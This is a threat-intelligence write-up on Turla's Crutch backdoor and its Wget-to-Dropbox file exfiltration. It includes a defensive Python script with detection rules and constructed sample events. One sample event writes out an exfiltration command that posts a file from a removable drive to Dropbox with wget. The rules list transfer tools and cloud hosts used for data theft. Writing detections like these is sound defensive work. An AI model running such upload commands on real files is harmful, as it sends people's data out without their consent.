Crutch is a sophisticated malware attributed to the Turla group, first discovered by ESET researchers in December 2020. It is considered a second-stage backdoor and achieves persistence through DLL hijacking. One notable feature of Crutch v4 is its ability to automatically upload files found on local and removable drives to Dropbox storage using the Windows version of the Wget utility, whereas previous versions relied on backdoor commands to do so. Older iterations of Crutch included a backdoor that communicated with a hard-coded Dropbox account via the official Dropbox HTTP API.
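The two observables described above (a command-line download tool invoked against Dropbox, and a non-browser, non-Dropbox process talking to the Dropbox HTTP API) are the natural hooks for endpoint detection. The following is an added example, not code from ESET, Palo Alto Networks or the page; it runs a pair of rules over constructed process-creation and network-connection events. The event field names (`type`, `image`, `command_line`, `dest_host`) follow a generic EDR schema and are an assumption, as is the allow-list of processes expected to talk to Dropbox; the Dropbox API hostnames are real, but the page does not state which endpoints Crutch used.

```python
"""Rule-based detection of the Crutch v4 exfiltration pattern:
wget/curl invoked with a Dropbox URL, and unexpected processes reaching
the Dropbox API. All events below are constructed for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Real Dropbox API hostnames; which of them Crutch used is not stated on the
# page, so treat the list as an assumption to be tuned from telemetry.
DROPBOX_HOSTS = ("api.dropboxapi.com", "content.dropboxapi.com", "dropbox.com")

# Assumed allow-list: processes that legitimately talk to Dropbox here.
EXPECTED_DROPBOX_CLIENTS = {"dropbox.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line transfer tools that rarely need a cloud-storage API.
TRANSFER_TOOLS = {"wget.exe", "wget", "curl.exe", "curl"}

# Assumption: only C: is a fixed drive; D: and above are treated as removable.
REMOVABLE_DRIVE = re.compile(r"(?<![A-Za-z0-9])[D-Z]:\\", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    image: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _mentions_dropbox(text: str) -> bool:
    t = text.lower()
    return any(h in t for h in DROPBOX_HOSTS)


def _is_dropbox_host(host: str) -> bool:
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in DROPBOX_HOSTS)


def evaluate(event: Dict[str, str]) -> List[Alert]:
    """Apply both rules to one event and return any alerts raised."""
    alerts: List[Alert] = []
    image = _basename(event.get("image", ""))
    kind = event.get("type")

    if kind == "process_create":
        cmd = event.get("command_line", "")
        # Rule 1: a transfer tool pointed at Dropbox is the v4 upload pattern.
        if image in TRANSFER_TOOLS and _mentions_dropbox(cmd):
            detail = "transfer tool invoked against Dropbox"
            if REMOVABLE_DRIVE.search(cmd):
                detail += "; source path on a non-fixed drive"
            alerts.append(Alert("wget_dropbox_upload", image, detail))

    elif kind == "network_connect":
        host = event.get("dest_host", "")
        # Rule 2: Dropbox API traffic from anything but an expected client.
        if _is_dropbox_host(host) and image not in EXPECTED_DROPBOX_CLIENTS:
            alerts.append(Alert("unexpected_dropbox_api_client", image,
                                f"{image} connected to {host.lower()}"))
    return alerts


def scan(events: List[Dict[str, str]]) -> List[Alert]:
    return [alert for event in events for alert in evaluate(event)]


# Constructed sample telemetry: one benign curl download, one legitimate
# Dropbox client, and three events matching the Crutch pattern.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Users\alice\AppData\Roaming\wget.exe",
     "command_line": r"wget.exe --post-file=E:\docs\report.docx https://content.dropboxapi.com/"},
    {"type": "process_create", "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "command_line": "curl.exe -O https://example.invalid/tool.zip"},
    {"type": "network_connect", "image": r"C:\Program Files\Dropbox\Client\Dropbox.exe",
     "dest_host": "api.dropboxapi.com"},
    {"type": "network_connect", "image": r"C:\Users\alice\AppData\Roaming\wget.exe",
     "dest_host": "content.dropboxapi.com"},
    {"type": "network_connect", "image": r"C:\Windows\System32\svchost.exe",
     "dest_host": "api.dropboxapi.com"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.image}: {a.detail}")
```

Rule 1 keys on the tool rather than on a file hash, because the page notes that Crutch v4 simply ships the Windows build of Wget; rule 2 catches both the v4 uploader and the older backdoor's direct API use, since neither runs as a browser or the Dropbox client. The allow-list is where false positives are managed in practice.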
The malware was detected and reported through Cortex XDR, which raised both prevention and detection alerts. These alerts were not exclusive to Crutch but also covered other malware such as Capibar, Kazuar, Snake, QUIETCANARY/Tunnus, Kopiluwak, ComRAT, Carbon, HyperStack, and TinyTurla. MITRE ATT&CK, a globally accessible knowledge base of adversary tactics and techniques, was used to map and analyze the Crutch attacks.
On the mitigation side, Cortex XDR displayed both execution-prevention and detection alerts for Crutch, indicating that the system can identify the malware and prevent it from carrying out its intended operations. This discovery underscores the importance of robust cybersecurity measures and the continued vigilance required to combat evolving cyber threats.
Description last updated: 2024-05-04T18:48:59.528Z